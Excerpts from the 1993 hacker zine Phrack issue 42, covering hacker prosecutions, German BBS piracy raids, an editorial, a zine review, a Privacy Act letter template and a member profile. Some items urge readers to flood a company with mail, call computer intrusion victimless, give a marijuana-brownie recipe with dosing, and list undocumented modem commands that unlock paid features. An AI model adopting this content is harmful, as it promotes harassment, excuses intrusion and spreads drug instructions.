  836.                              * BLACK ICE PRIVATE *
  837.                             * THE PHOENIX PROJECT *
  838.  
  839.                                And many more...
  840.  
  841.                Messages are available in many computer formats:
  842.                                       IBM
  843.                                      Amiga
  844.                                    Macintosh
  845.  
  846.             For more information, please contact LOD Communications
  847.  
  848.                       email:  lodcom@mindvox.phantom.com
  849.  
  850.                          US Mail:  LOD Communications
  851.                                 603 W. 13th St.
  852.                                  Suite 1A-278
  853.                                Austin, TX 78701
  854.  
  855.                            Voice Mail:  512-448-5098
  856. -----------------------------------------------------------------------------
  857.  
  858. You might like this one...
  859. --bob
  860. ****************************************
  861. I just saw a transcript of a press conference given by
  862. Secret Service Agent Frericks, in Lubbock last December.
  863.  
  864. here is a brief extraction...
  865.  
  866. FRERICKS: Um hm. This is a major nation wide, world wide problem from
  867. an industry point of view with tremendous losses in funds tremendous
  868. losses of money. the VAX account at the University is a way to get
  869. into numerous other research accounts or Internet which is the ...you
  870. get onto Internet you can talk to anybody else who is on Internet
  871. anywhere in the world which these kids were talking to Belgium, and
  872. Israel and Australia and they can do that just by this, thus avoiding
  873. long distance phone calls.  But most of the people on Internet I mean
  874. on the VAX are there legitimately for research purposes they can go to
  875. Mayo and get a file if they're a med student and they also get one of
  876. these pamphlets if they get, like the Department of Engineering gives
  877. out an account number just for that semester, the professor would give
  878. it out so you can use the VAX well they also get one of those
  879. pamphlets that explains what the rules are and the instructor spends a
  880. good bit of time the first couple of classes going over computer
  881. etiquette, computer rules.
  882.  
  883. [Editor:  Another of America's finest.]
  884.  
  885. -----------------------------------------------------------------------------
  886.  
  887.  
  888.     I typed this because of the mention of Software Security International in
  889. the article "More than $100,000 in Illegal Software Seized" in Rambone's
  890. Pirates Cove in Phrack 41.
  891.     He mentioned that they were the investigators that finally brought down
  892. APL. I am not only familiar with that, a past friend of mine was
  893. there when the Marshalls took the board. He was there as representative of
  894. SSI.
  895.  The best part that Rambone didn't know, was that they couldn't get into
  896. APL to verify the existence of the software, until they got the password
  897. breaker from Novell. So in essence, they looked like some dumb fools.
  898. They didn't have any idea on how to approach the network.
  899.  
  900.  Software Security International Can be reached at...
  901.   1-800-724-4197
  902.  
  903.   2020 Pennsylvania Avenue N.W.
  904.   Suite 722
  905.   Washington, D.C. 20006-1846
  906.  
  907. That is of course if they finally have gotten off the ground. Last I Heard (2-3
  908. months ago) they were still having trouble getting Financial Backing. They did
  909. the APL Bust for nothing, just to prove they could do it. They are also on a
  910. lot of other BBS's around America. So as a warning to other sysops, Cover your
  911. Ass.
  912.  
  913.  You could rack up some serious negative cash flow by sending tons of
  914. mail to the box above, then it gets Airborne'd to Washington State.
  915.  
  916. see ya
  917.  
  918. [Editor:  I think it might be a good idea to send them a few postcards
  919.           every day for the next few weeks.  Just to stay in touch.]
  920. -----------------------------------------------------------------------------
  921.  
  922.                          ==Phrack Magazine==
  923.  
  924.               Volume Four, Issue Forty-Two, File 2b of 14
  925.  
  926.                         [-=:< Editorial >:=-]
  927.  
  928. Before I jump upwards onto my soapbox and spew forth a meaty
  929. editorial I would like to relay something to the readers of Phrack.
  930. The following is a transcript of John Lee's  (Corrupt's) confession
  931. to the charges facing him.  (From Security Insider Report, Jan. 1993)
  932.  
  933. What follows is in my opinion a very poor attempt at a plea-bargain,
  934. and obviously induced by attorney coercion.  I must wonder what John
  935. was thinking when he agreed to this admission.
  936. ======================================================================
  937.  
  938. I agreed with others to violate various laws related to the use of
  939. computers.  I agreed to do the following:
  940.  
  941. 1)  I agreed to possess in excess of fifteen passwords which
  942.     permitted me to gain access to various computer systems
  943.     including all systems mentioned in the indictment and others.
  944.     I did not have authorization to access these systems.  I knew
  945.     at the time that what I did was wrong.
  946.  
  947. 2)  I used these access devices and in doing so obtained the value of time
  948.     I spent within these systems as well as the value of the passwords
  949.     themselves which I acknowledge was more than $1000.
  950.  
  951. 3)  I intentionally gained access to what I acknowledge are Federal interest
  952.     computers and I acknowledge that work had to be done to improve the
  953.     security of these systems which was necessitated by my unauthorized
  954.     access.
  955.  
  956. 4)  I was able to monitor data exchange between computer systems and by
  957.     doing so intentionally obtained more passwords, identifications and
  958.     other data transmitted over Tymnet and other networks.
  959.  
  960. 5)  I acknowledge that I and others planned to share passwords and
  961.     transmitted information across state boundaries by modem or telephone
  962.     lines and by doing so obtained the monetary value of the use of the
  963.     systems I would otherwise have had to pay for.
  964.  
  965. Among the ways I and others agreed to carry out these acts are the following:
  966.  
  967.   1.  I was part of a group called MOD.
  968.  
  969.   2.  The members of the group exchanged information including passwords
  970.       so that we could gain access to computer systems which we were not
  971.       authorized to access.
  972.  
  973.   3.  I got passwords by monitoring Tymnet, calling phone company
  974.       employees and pretending to be computer technicians, and using
  975.       computer programs to steal passwords.
  976.  
  977. I participated in installing programs in computer systems that would give
  978. the highest level of access to members of MOD who possessed the secret
  979. password.
  980.  
  981. I participated in altering telephone computer systems to obtain
  982. free calling services such as conference calling and free billing
  983. among others.
  984.  
  985. Finally, I obtained credit reports, telephone numbers and addresses
  986. as well as other information about individual people by gaining access
  987. to information and credit reporting services.  I acknowledge that on
  988. November 5, 1991, I obtained passwords by monitoring Tymnet.
  989.  
  990. I apologize for my actions and am very sorry for the trouble I have
  991. caused to all concerned.
  992.  
  993. John Lee
  994.  
  995.  
  996. ==========================================================================
  997.  
  998.  
  999. This issue I would like to call attention to what I consider to be
  1000. a very pressing issue.  There has always been a trend to pad the
  1001. amount of dollar damages incurred to any victim of a hacker attack.
  1002. I personally feel that the blame is never directed at the true guilty
  1003. parties.
  1004.  
  1005. Certainly, if someone is caught breaking into a system, then they are
  1006. surely guilty of some form of electronic trespass.  I will also
  1007. concede that such a person may or may not be guilty of other crimes
  1008. based upon their actions once inside that system.  What I have the
  1009. most problems dealing with is the trend to blame the hacker for any
  1010. expenditures needed to further secure the system.
  1011.  
  1012. With this mindset, why should any corporation bother to add any
  1013. security at all?  Why not just wait until someone happens across
  1014. a few poorly secured sites, nab them, and claim damages for the
  1015. much needed improvements in security?
  1016.  
  1017. The worst culprits in this type of behavior has been the RBOCs.  As was
  1018. seen with the supposed damages incurred for the distribution of the
  1019. "911 document" and most recently with the $370,000 damages supposedly
  1020. incurred by Southwestern Bell resulting from the alleged activities
  1021. of those in MOD.
  1022.  
  1023. Perhaps this figure does have some basis in reality, or perhaps it is
  1024. just an arbitrary figure dreamed up by a few accountants to be used
  1025. at year end to explain some losses in the corporate stock report.
  1026. Most often figures such as this factor in such ridiculous items as
  1027. the actual system hardware penetrated.  I can hardly see the relevance
  1028. of such a charge.
  1029.  
  1030. Even if these charges are to be believed, why isn't the blame being
  1031. evenly distributed?  Why aren't stockholders crying for the heads of
  1032. system administrators, MIS managers and CIOs?  These are the people who
  1033. have not adequately done their jobs, are they not?  If they had expended
  1034. a bit of time, and a small amount of capital, the tools exist to make
  1035. their systems impervious to attack.  Period.
  1036.  
  1037. If I had an investment in a company such as Southwestern Bell, I would be
  1038. outraged that the people I was employing to perform data security
  1039. functions were not apt enough to keep a group of uneducated gangsters
  1040. out of their switching systems.  Why haven't there been any emergency
  1041. meetings of shareholders?  Why isn't anyone demanding any changes in policy?
  1042. Why is everyone still employed?
  1043.  
  1044. Not to blame Southwestern Bell too harshly, they were sorely outclassed
  1045. by MOD, and had absolutely no way to cope with them.  Not only because MOD
  1046. were competent telco hackers, but because Southwestern Bell's network
  1047. service provider had given them free reign.
  1048.  
  1049. Southwestern Bell's packet switched network, Microlink II, was designed
  1050. and implemented for SWBT by Tymnet (then owned by McDonnell Douglas).
  1051. An interesting thing I've heard about SWBNET, and about every other subnet
  1052. arranged by Tymnet, is that the information concerning gateways, utilities,
  1053. locations of node code, etc., is purported to be located in various
  1054. places throughout Tymnet internal systems.  One such system, was described
  1055. to me as a TYMSHARE system that contained data files outlaying every subnet
  1056. on Tymnet, the mnemonics (username/password pair) to each utility, gateway,
  1057. and the ONTYME II mail access keys.
  1058.  
  1059. If this information is correct, then shouldn't Tymnet be called in to
  1060. acknowledge their role in the attacks on Southwestern Bell?
  1061.  
  1062. Let's say a Realtor sold you a house, but told you that he would be keeping
  1063. copies of all your keys so that he could help you with the maintenance.
  1064. Some time later, you notice that a few of your books have been read, but
  1065. nothing else is disturbed.  Later on you notice that your tv is on and your
  1066. bed is all messed up.  A week later your stereo is gone.  You set up a trap
  1067. and catch someone going into your house with your own key!  You find that
  1068. the burglars had made copies of all the keys held by your Realtor.  You
  1069. then find that the Realtor neglected to put the keys in a safe, and in fact
  1070. had left them lying around on the table in his back yard labeled with
  1071. the addresses they corresponded to.
  1072.  
  1073. Who would you be more upset with?  The individual who copied and used the
  1074. keys, or the Realtor for not providing the access to your valuables more
  1075. vigilantly?  I would personally be far more upset with the Realtor, for
  1076. if he had put the keys in a safe this event would have probably never
  1077. transpired.
  1078.  
  1079. I'm not saying that people who get caught for breaking into computer
  1080. systems should be let go, especially if they can be proven to be involved
  1081. in the sale of hacked information for a personal profit.  What I am saying
  1082. that if hackers are to be punished so vigorously for what I view as a
  1083. predominantly victimless crime, then everyone should have to line
  1084. up and take their fair share of the blame.
  1085.  
  1086. I think it's high time that the real blame be placed on the corporate
  1087. entities who seemingly refuse to acknowledge their role in these
  1088. break-ins.  Neglect of duties and lack of responsibility on the part
  1089. of the employees, the interconnect carriers, the data network providers,
  1090. the hardware vendors, etc. all play a key role in the problems that
  1091. exist in the world's data networks today.  In fact, if it were not for
  1092. computer hackers, these problems would continue to lie dormant until either
  1093. discovered by accident in the field, or the provider decided to go ahead
  1094. and illuminate its clients to the existence of such a problem.
  1095.  
  1096. I wholeheartedly encourage each and every reader of Phrack to
  1097. purchase one share of stock in any corporation you know that has exhibited
  1098. such tendencies and take your place on the floor of the next shareholders
  1099. meeting and scare the hell out of the board of directors.
  1100. Phrack Magazine is calling a discount brokerage very soon.
  1101.  
  1102. -------------------------------------------------------------------------------
  1103.  
  1104.                          ==Phrack Magazine==
  1105.  
  1106.               Volume Four, Issue Forty-Two, File 2c of 14
  1107.  
  1108.  
  1109.                            //   //  /\   //   ====
  1110.                           //   //  //\\ //   ====
  1111.                          ==== //  //  \\/   ====
  1112.  
  1113.                      /\   //  // \\    //  /===   ====
  1114.                     //\\ //  //   //  //   \=\   ====
  1115.                    //  \\/    \\ //  //   ===/  ====
  1116.  
  1117. ******************************************************************************
  1118.  
  1119.                           BBS Busts in Germany
  1120.                           ====================
  1121.  
  1122.  
  1123. Thursday, March 18, 1993.
  1124.  
  1125. This day will be remembered as a black day in German BBS history.
  1126. In fact, it was the blackest day in German BBS history since the raid
  1127. of 18 Berlin BBS in Berlin and North Germany a couple of months ago.
  1128.  
  1129. What has happened?  A couple of Bulletin Board Systems (BBS) have
  1130. been raided by the police.  All these BBS had "warez" online, illegal,
  1131. pirated, copyrighted Software - usually for PC/MSDOS and Amiga.
  1132. This time, most of these BBS were in Bavaria, South Germany.
  1133.  
  1134. Now let's take a closer look at the events:
  1135.  
  1136. One guy who got busted was MST, Sysop of Southern Comfort BBS
  1137. in Munich.  In fact, his board went offline 9 days before.
  1138. But he was so unlucky still having his computer and his warez.
  1139. He was even using his modem to trade warez at the very moment
  1140. the cops rang his doorbell.  Why did he go offline just so short
  1141. before he got busted?  His board had been running for over 1 year.
  1142.  
  1143. Here is the text file MST released about going offline:
  1144.  
  1145. THURSDAY 03-09-93 00:15
  1146. THE SOUTHERN COMFORT BBS IS CLOSED !
  1147. I AM NOT BUSTED OR ANYTHING LIKE THIS !
  1148. I CLOSED THE BBS COS OF PERSONAL REASONS AND
  1149. PERHAPS IT WILL BE OPENED AGAIN IN 1 OR 2 MONTH !
  1150. I HOPE YOU WOULD UNDERSTAND THIS DECISION BUT SCENE
  1151. IS NOT ALL WHAT LIFE CAN BE ALL USER ACCOUNTS STAY
  1152. ALIVE AND WILL BE HERE AT A NEW??? OPENING !
  1153.  
  1154. SO I SAY BYE TO THE SCENE FOR PERHAPS ONLY A SHORT TIME !
  1155.  
  1156. MST/RAZOR 1911
  1157.  
  1158. A couple of days later, MST was posting ads in local BBS to sell his
  1159. old equipment.  But obviously he wasn't fast enough.  Maybe this was
  1160. one of the reasons the cops busted him on March, 18.  They were afraid
  1161. he might get rid of his illegal software, so they hurried up to catch him!
  1162.  
  1163. He got busted at 10am this morning.  Three cops were knocking on his door,
  1164. until he opened.  They had a search warrant and confiscated all his
  1165. computer equipment, disks, modems...
  1166.  
  1167. Chris used to have a board until four months ago, and now trades for TDT and
  1168. other groups.  He was in school this morning.  His parents weren't home
  1169. either.  So the cops broke into his house, smashed the wooden door, and
  1170. seized all his equipment.  He is asked to speak to the Police this Tuesday.
  1171.  
  1172. Chris used to be one of the most active traders for PC warez in Germany.
  1173. He and his friend Michelangelo supported boards like Schizophrenia and
  1174. Beverly Hills, which they co-sysop'ed.  They were also known as the
  1175. 'Beverly Hills Boys', a new German cracking group.
  1176.  
  1177. After Chris' bust, a couple of boards were affected:
  1178. Beverly Hills went offline.  Also the German Headquarters of the Beverly
  1179. Hills Boys, 'Twilight Zone', went offline.  Their sysops estimate at least
  1180. 1-3 months offline time.
  1181.  
  1182. The other Munich BBS and their sysops were really scared after the bust
  1183. and took down their systems for an uncertain amount of time.
  1184.  
  1185. One of Germany's largest BBS, Darkstar in Augsburg, was a heaven for
  1186. every warez collector.  It had 8 modems hooked up (all US Robotics Dual
  1187. Standard 16.8) and one ISDN Line.
  1188.  
  1189. It had over 2 GB PC warez online, and over 7 GB offline on tapes, which
  1190. would be put online according to user' requests.
  1191.  
  1192. But then, March 18 arrived, and the dream was shattered.
  1193. Its sysop, Rider, who was happily calling boards the previous day,
  1194. had the most shocking experience in his life.  The cops came and
  1195. took his BBS.
  1196.  
  1197. And more..
  1198. Ego, co-sysop of a large German BBS, got busted.
  1199. Andy/Spreadpoint (ex-sysop) got busted.
  1200. And lots of others...
  1201.  
  1202. Unlike the US Secret Service, which delights in seizing all
  1203. electronic equipment, like stereos, TVs, VCRs, the German cops
  1204. were just after the computer hardware, especially the hard drives
  1205. and file servers.
  1206.  
  1207. They usually come with three or four people.  All of the search warrants
  1208. they were using were quite old, issued last December.
  1209.  
  1210. Who is behind those actions?
  1211. First of all the BSA, Business Software Association.  They
  1212. were also responsible for the recent raids of US Bulletin Boards.
  1213. In Germany they just announced actions against piracy and
  1214. bulletin boards.  The most active BSA Members are Microsoft and
  1215. Lotus Development.  Microsoft, Lotus and the BSA are all located
  1216. in Munich, Germany, home of German's most feared lawyer,
  1217. Guenther Freiherr von Gravenreuth.  This guy has been fighting
  1218. for years against piracy, young kids who copy games, and especially
  1219. bulletin board systems.  He is also affiliated with Ariolasoft, a huge
  1220. German distributor for game labels like Activision and others.
  1221.  
  1222. In the end, all I can say is:
  1223. Be aware, don't get caught and don't keep illegal stuff on your board!
  1224.  
  1225.                   (c) 1993 SevenUp for Phrack
  1226.  
  1227. ******************************************************************************
  1228.  
  1229. Carlcory's brownies:
  1230.  
  1231. /* Begin cc_brownie.c */
  1232.  
  1233. Includes:
  1234. #include "4_squares_baking_chocolate"
  1235. #include "1_cup_butter"
  1236. #include "2_cups_sugar"
  1237. #include "4_eggs"
  1238. #include "2_cups_flour"
  1239. #include "2_tbs_vanilla"
  1240. #include "1_third_cup_marijuana"        /*comment out if won't compile
  1241.                                             on your system*/
  1242. #include "1_cup_nuts"                   /*comment out if won't compile*/
  1243.  
  1244. void main(void);
  1245.  
  1246. {
  1247.     heat(oven, 350);
  1248.     add(butter, chocolate);
  1249.     while(texture!='smooth')    {
  1250.         stir(mixture);
  1251.     }
  1252.     Add(sugar);
  1253.     add(eggs);
  1254.     add(vanilla);
  1255.     add(flour, pot);
  1256.     add(nuts)
  1257.     for(timer=0; timer<35; timer++) {
  1258.         bake(mixture);
  1259.     }
  1260.     cool(hour);
  1261. }
  1262.  
  1263.  
  1264. /*The high takes about an hour to come on,
  1265.  but lasts for 12 hrs. (4 brownies)
  1266.  Make sure they cool (don't burn your mouth!)
  1267.  and share with friends! */
  1268.  
  1269.  
  1270. /*End of cc_brownie.c*/
  1271.  
  1272. ******************************************************************************
  1273.  
  1274. GRAY AREAS
  1275. Examining the Gray Areas of Life
  1276.  
  1277. Gray Areas, Inc.
  1278. P.O. Box 808
  1279. Broomall, PA  19008-0808
  1280. (215)353-8238
  1281. grayarea@well.sf.ca.us
  1282.  
  1283.  
  1284. Gray Areas is published quarterly and printed on recycled paper.  They also
  1285. participate in local recycling efforts involving cans, glass, clothing,
  1286. newspapers, and more.
  1287.  
  1288. A four-issue subscription costs $18.00 US or $26.00 foreign (payable in US
  1289. funds).  A 12-issue subscription costs $50.00 ($75.00 foreign).  You may
  1290. purchase a twelve issue subscription and give 4 or 8 or those issues away as
  1291. gifts to friends (i.e., the same 4 issues you receive would also go to 2 other
  1292. recipients). Make check or money order out to Gray Areas, Inc.
  1293.  
  1294. STATEMENT OF PURPOSE:
  1295.  
  1296. Gray Areas exists to examine the gray areas of life.  We hope to unite people
  1297. involved in all sorts of alternative lifestyles and deviant subcultures.  We
  1298. are everywhere!  We felt that the government has done a great job of splitting
  1299. people up so that we do not identify with other minority groups anymore.  There
  1300. are so many causes now that we often do not talk to others not directly
  1301. involved in our chosen causes.  We believe that the methods used to catch
  1302. criminals are the same regardless of the crime and that much can be learned by
  1303. studying how crimes in general are prosecuted and how people's morals are
  1304. judged.  It is our mission to educate people so they begin to case more about
  1305. the world around them. Please join our efforts by subscribing, advertising your
  1306. business with us, and by spreading the word about what we're up to.
  1307.  
  1308. __________________________
  1309.  
  1310. Review by Knight Lightning:
  1311.  
  1312. I recently received a copy of the premier issue of Gray Areas, dated Fall 1992
  1313. and with a cover price of $4.50 (US).  I was impressed with both the laser
  1314. quality of the printing, artwork, and graphics, as well as the topics and
  1315. content of the articles.
  1316.  
  1317. I would not characterize Gray Areas as a hacker magazine, but the subject did
  1318. come up in an interview with John Perry Barlow (one of the original founders of
  1319. the Electronic Frontier Foundation) where he discussed the EFF and its role in
  1320. defending civil liberties.
  1321.  
  1322. No, instead I think it is safe to say that Gray Areas pays a lot of attention
  1323. to the Grateful Dead.  Indeed the cover story is titled "Grateful Dead
  1324. Unauthorized Videos."  Additionally, there are several other articles
  1325. (including the John Barlow interview) that discuss varying aspects about the
  1326. Dead's history, their politics, and of course their music.  An advertisement
  1327. for the next issue of Gray Areas reveals that even more articles relating to
  1328. the Grateful Dead are on the way; so if you are a "Dead Head" you will probably
  1329. fall in love with this magazine!
  1330.  
  1331. However, the article that I appreciated most was "Zine Scene," a review of 163
  1332. alternative newsletters that included such familiar names as 2600, Hack-Tic,
  1333. Full Disclosure, and TAP; and others that I intend to take a look at like Iron
  1334. Feather's Journal and bOING bOING.  The zines reviewed here covered every topic
  1335. imaginable and I thought it was a great buffet for the mind to have such handy
  1336. directory (especially since Factsheet Five went defunct about a year ago).
  1337.  
  1338. Other interesting articles had to do with video, audio, and software piracy and
  1339. reviews of music and software.  I also enjoyed the great artwork found
  1340. throughout the magazine in the form of visual aids, comics, and advertisements.
  1341.  
  1342. If you are a fan of alternative music or the Grateful Dead, you'll be very
  1343. sorry if you don't subscribe immediately.  If you are interested in alternative
  1344. publications with more interesting points of view than Time or Newsweek then
  1345. you owe it to yourself to at least purchase a copy to check it out.
  1346.  
  1347. - - - - - - - - -
  1348.  
  1349. All letters sent to Gray Areas are presumed to be for publication unless you
  1350. specifically request that they omit your name or refrain from publishing your
  1351. comments.  If you are writing about something which could incriminate yourself,
  1352. they will protect your identity as a matter of policy.
  1353.  
  1354. ******************************************************************************
  1355.  
  1356.                 "Turning your USR Sportster w/ 4.1 roms
  1357.                     into a 16.8K HST Dual Standard"
  1358.  
  1359.                                    by
  1360.  
  1361.                       The Sausage with The Mallet
  1362.  
  1363.  
  1364. If you have a USRobotics Sportster FAX modem, Ver 4.1, you can issue
  1365. the following commands to it to turn it into an HST 16.8K dual standard.
  1366. In effect, you add HST 16.8K to its V32.bis 14.4k capability.
  1367.  
  1368. ats11=40v1L3x4&h1&r2&b1e1b1&m4&a3&k3
  1369. atgw03c6,22gw05cd,2f
  1370. ats14=1s24=150s26=1s32=8s34=0x7&w
  1371.  
  1372. A very important item is the b1, which tells the modem to use
  1373. the 16.8K HST protocol.  If you do not set b1, when the Sportster
  1374. connects with another V32 modem it will go through the CCITT v.32
  1375. connect tones and you will not get a 16.8K connect.
  1376.  
  1377. If you do get an HST connect, you will not hear the "normal"
  1378. train phase--instead you will hear the HST negotiation which
  1379. sounds like a 2400 baud carrier.
  1380.  
  1381. Finally, if you change the "cd" in the second line to a "cb", your
  1382. modem will think it is a V.32 Courier instead of an HST 16.8K.
  1383.  
  1384. Look for other pfine pfiles from Rancid Bacon Productions in conjunction
  1385. with USDA Grade A Hackers (UGAH.)  Accept no substitutes.
  1386.  
  1387. *******************************************************************************
  1388.  
  1389.    Request to Post Office on Selling of Personal Information
  1390.  
  1391.     In May 1992, the US Postal Service testified before the US House of
  1392.  Representatives' Government Operations Subcommittee that National Change of
  1393.  Address (NCOA) information filled out by each postal patron who moves and
  1394.  files that move with the Post Office to have their mail forwarded is sold to
  1395.  direct marketing firms without the person's consent and without informing
  1396.  them of the disclosure. These records are then used to target people who
  1397.  have recently moved and by private detective agencies to trace people, among
  1398.  other uses. There is no way, except by not filling out the NCOA form, to
  1399.  prevent this disclosure.
  1400.  
  1401.     This letter is to request information on why your personal information
  1402.  was disclosed  and what uses are being made of it. Patrons who send in this
  1403.  letter are encouraged to also forward it and any replies to their
  1404.  Congressional Representative and Senators.
  1405.  
  1406.  
  1407.  Eligible requestors: Anyone who has filed a change of address notice with
  1408.  the Postal Service within the last five years.
  1409.  
  1410.  
  1411.  
  1412.  Records Officer
  1413.  US Postal Service
  1414.  Washington, DC 20260                        PRIVACY ACT REQUEST
  1415.  
  1416.  
  1417.  Dear Sir/Madam:
  1418.  
  1419.    This is a request under the Privacy Act of 1974 (5 USC 552a). The Act
  1420.  requires the Postal Service, as a government agency, to maintain an
  1421.  accounting of the date, nature, and purpose of each disclosure of
  1422.  information about individuals. I request a copy of the accounting of all
  1423.  disclosures made of address change and mail forwarding information that I 
  1424. provided
  1425.  to the Postal Service. This information is maintained in USPS System of
  1426.  Records 010.010.
  1427.  
  1428.    On or about (date), I filed a change of address notice requesting that my
  1429.  mail be forwarded from (old address) to (new address). The name that I used
  1430.  on the change of address form was (name).
  1431.  
  1432.    This request includes the accounting of all disclosures made by the Postal
  1433.  Service, its contractors, and its licensees.
  1434.  
  1435.    I am making this request because I object to the Postal Service's policy of
  1436.  disclosing this information without giving individuals an option to prevent
  1437.  release of this information. I want to learn how my information has been
  1438.  disclosed and what uses have been made of it. Please let the Postmaster
  1439.  General know that postal patrons want to have a choice in how change of
  1440.  address information is used.
  1441.  
  1442.    If there is a fee in excess of $5 for this information, please notify me in
  1443.  advance. Thank you for consideration of this request.
  1444.  
  1445.  
  1446.  Sincerely,
  1447.  
  1448.  
  1449.  
  1450.  CC: Your Congressional Representative
  1451.      US House of Representatives
  1452.      Washington, DC 20510
  1453.  
  1454.      Your Senators
  1455.      US Senate
  1456.      Washington, DC 20515
  1457.  
  1458. -------------------------------------------------------------------------------
  1459.  
  1460.  
  1461.  
  1462.  
  1463. Date:     Tue Mar 23, 1993  5:02 pm  PST
  1464. From:     phrack
  1465.           EMS: INTERNET / MCI ID: 376-5414
  1466.           MBX: phrack@stormking.com
  1467.  
  1468. TO:       Mitchell K. Hobish / MCI ID: 116-6178
  1469. TO:       Anthony Weiner / MCI ID: 300-6908
  1470. TO:       Thomas J. Klotzbach / MCI ID: 375-1365
  1471. TO:       Andrew Koran / MCI ID: 396-7939
  1472. TO:       Pascal Lointier / MCI ID: 504-4319
  1473. TO:     * Berton Corson / MCI ID: 528-0397
  1474. TO:       Jeff Ubois / MCI ID: 554-3399
  1475. TO:       Multiple recipients of list
  1476.           EMS: INTERNET / MCI ID: 376-5414
  1477.           MBX: phrack@stormking.com
  1478. Subject:  Phrack 42/3-14
  1479.  
  1480.                                 =Phrack Magazine=
  1481.  
  1482.                   Volume Four, Issue Forty Two, Phile 3 of 14
  1483.  
  1484.                               ==Phrack Pro-Phile==
  1485.  
  1486. _______________________________________________________________________________
  1487.  
  1488.      Phrack Pro-Phile was created to provide info to you, the users, about old
  1489. or highly important/controversial people.  This month, we introduce you
  1490. to an individual who has survived the underground for far too long,
  1491. the creator of Phantom Access and one of the co-sysops of Mindvox...
  1492.  
  1493.                                   Lord Digital
  1494.                                   ~~~~~~~~~~~~
  1495. _______________________________________________________________________________
  1496.  
  1497.  Personal
  1498.  ~~~~~~~~
  1499.              Handle:  Lord Digital (for like.... fuck I'm old, 13 years now)
  1500.            Call him:  Patrick K. Kroupa
  1501.        Past handles:  M000hahahahahahahah!  You're kidding right?
  1502.       Handle origin:  It was given to me by this ancient wise man drinking
  1503.                       cheap Absolut by the side of the road...
  1504.       Date of Birth:  01/20/68
  1505. Age at current date:  24
  1506.              Height:  6'2"
  1507.              Weight:  185
  1508.           Eye color:  Green
  1509.          Hair Color:  Blonde/brunette/black (subject to change)
  1510.            Computer:  Apple ][+, Amiga 1000, Mac Plus (All in storage)
  1511.                       Apple //e, Amiga 500, NeXT, Various Suns (Not in storage)
  1512.   Sysop/Co-Sysop of:  MindVox ELItE!@#!!!@#!
  1513.         Net address:  digital@phantom.com
  1514. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1515.  
  1516.      If you look beneath the shiny surface of most things, and gze way-way-way
  1517. deep down into the murky black festering heart of the human evolutionary
  1518. process, you are ultimately confronted with the revelation that has stood, nay,
  1519. LEAPT UP before the ancients since before the days of Atlantis:  Life is a lot
  1520. like NeW WaReZ.
  1521.  
  1522.      Anybody who tried to tell you something different, is obviously selling
  1523. you something.
  1524.  
  1525.      All things in this universe -- and many others -- can be attributed to New
  1526. WareZ.  The ebb and flow of WareZ is what keeps the very COSMOS from bursting
  1527. apart at the seams.  During periods of time when the flow of WareZ slows to a
  1528. trickle, times are tough, there is war, pestilence, death, disease, and many
  1529. rAg PhIleZ.  d()oDZ who were happily playing Ultima XXII Quest For Cash, are
  1530. soon busily hurling insults at each other and dialing the Secret Service.  Life
  1531. is grim, there is a bleak sense of desolation and emptiness . . . for when the
  1532. WareZ slow down . . . there is little left to live for and you begin to enter
  1533. withdrawal.  An ugly process that, thus far, has only been combatted
  1534. successfully by Wally Hills NeW WhErEZ Treatment center, where they slowly ween
  1535. you off the addiction of WareZ and introduce you to the REAL WORLD where you
  1536. can do things like smoke crack and play in a band.
  1537.  
  1538.      On the flipside, when there is a good steady flow of WaReZ, the universe
  1539. hums to itself in happiness and all wrongs are righted, perspectives
  1540. re-adjusted, and peace, love, and happiness spread throughout the land as the
  1541. COSMOS re-aligns itself and perfection sweeps the world.  This is a heady time,
  1542. but one that is sure to be brief, for before you know it some evil glimmer of
  1543. BADNESS will rise up and somebody will DOUBLE-RELEASE someone else, or a Ware
  1544. will CRASH when it tries to load . . . and then it's just all over.
  1545.  
  1546.      A long time ago in a galaxy far, far away . . . I was a founding member of
  1547. the Knights Of MysterIous keYboArdZ and the Ko0l/Ra{> alliance.  At present I
  1548. am President/Ce0 and Chairman of the b0red at Phantom Access
  1549. Technologies/Coleco ADAM design Studios, Inc.
  1550.  
  1551.      At the moment our group is working on a multi-tasking, multi-user,
  1552. CyberSpace environment where the participants can take part in a shared reality
  1553. that is based upon a cross-relational structure comprised of lots of 0's and
  1554. 1's all strung together in big twisty chains and kept track of by an
  1555. Objective-COBOL X/Motif GUI sitting on an SQL dialed into the POWER COMPUTER in
  1556. Utah, at infinite baud (not to be confused with bps).
  1557.  
  1558.      In the near future I .plan to move to Pigs Knuckle Idaho and cross-breed
  1559. weasels with ferrets, while devoting the rest of my life to watching daytime
  1560. TV.
  1561.  
  1562.      It's just that type of thing.
  1563.  
  1564. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1565.  
  1566. Reality Break
  1567. ~~~~~~~~~~~~~
  1568.  
  1569.      It is very difficult, bordering on impossible, for me to remain serious
  1570. for longer than about 45 seconds, when discussing the "underground" and what it
  1571. was all about.
  1572.  
  1573.      I rarely bother to mediate or water-down most of my opinions, and there
  1574. are a lotta places out there in the real world, where anyone who cares can
  1575. readily access whatever I have to say.  There isn't a great deal left for me to
  1576. convey to anybody regarding my perceptions of the hack/phreak world's history
  1577. and what it has meant, and shall mean, in the cosmic scheme of things.
  1578.  
  1579.      The first time I came into direct contact with computers was during the
  1580. mid-late 70's.  I was around 6 or 7 and my father worked at NCAR during this
  1581. period of time, which is a futuristic looking series of buildings in Boulder
  1582. Colorado.  This one time I came in, there were all these weird cars driving
  1583. around in the parking lot, and since there were frequently a lotta strange
  1584. things moving around there, I never understood until much later that Woody
  1585. Allen was filming SLEEPER when this was going on.  On the same day, I was shown
  1586. some of the computer rooms, which had just taken shipment on one of the first
  1587. Crays to go out the door.  This left an impression.  It was neato . . .
  1588.  
  1589.      One thing led to another.  I played around with various things, mainly the
  1590. really old Commodore PET systems and a slew of heavy metal junk from IBM, until
  1591. I got an Apple ][+ in 1978.  I hung out with a group of people who were also
  1592. starting to get into computers, most of them comprising the main attendees of
  1593. the soon-to-be-defunct TAP meetings in NYC, a pretty eclectic collection of
  1594. dudes who have long since gone their separate ways to meet with whatever
  1595. destinies life had in store for them.  Around 1980 there was an Apple Fest that
  1596. we went to, and found even more people with Apples and, from this, formed the
  1597. Apple Mafia, which was, in our minds, really cool sounding and actually became
  1598. the first WAreZ gRoUP to exist for the Apple ][.
  1599.  
  1600.      Time passed, I picked up more hardware, went on the quest to assemble the
  1601. perfect Apple-Cat system -- consisting of the Cat, 212 card, BSR, firmware,
  1602. tone decoder chip, and all the m0dZ NOVATION eventually made to the boardZ --
